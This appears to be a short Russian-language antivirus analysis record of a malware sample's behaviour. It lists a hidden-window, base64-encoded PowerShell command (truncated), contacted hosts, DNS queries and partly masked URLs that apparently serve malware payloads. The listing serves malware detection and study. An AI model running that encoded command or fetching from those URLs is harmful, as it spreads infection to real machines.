Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGIAdABmAHQAcwBjAG0APQAnAFcAagBnAGUAbwBzAHAAeABuAGUAdwBxAHEAJwA7ACQAUgBsAHEAdwBiAGgAcwB3ACAAPQAgACcANgA3ADYAJwA7ACQASQBjAG0AcQBqAHcAagBzAGUAdABxAD0AJwBSAHgAawBiAGUAaABoAGYAbAAnADsAJABDAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\1115329.cvr
- 'wu####gbicycle.com':80
- 'wu####gbicycle.com':443
- 'co###nce.com':80
- 'ta##ir.org':80
- 'ta##ir.org':443
- 'pk#.goog':80
- 'ob########iodatosabiertosgenero.org':80
- http://wu####gbicycle.com/modules/0baGb456952/
- http://co###nce.com/rougelux/brS915/
- http://ta##ir.org/wp-content/uploads/2020/02/SWx8315/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.ob########iodatosabiertosgenero.org/wp/E3k2695/
- 'wu####gbicycle.com':443
- DNS ASK wu####gbicycle.com
- DNS ASK co###nce.com
- DNS ASK ya####nsekora.org
- DNS ASK ta##ir.org
- DNS ASK pk#.goog
- DNS ASK ob########iodatosabiertosgenero.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGIAdABmAHQAcwBjAG0APQAnAFcAagBnAGUAbwBzAHAAeABuAGUAdwBxAHEAJwA7ACQAUgBsAHEAdwBiAGgAcwB3ACAAPQAgACcANgA3ADYAJwA7ACQASQBjAG0AcQBqAHcAagBzAGUAdABxAD0AJwBSAHgAawBiAGUAaABoAGYAbAAnADsAJABDAH...' (со скрытым окном)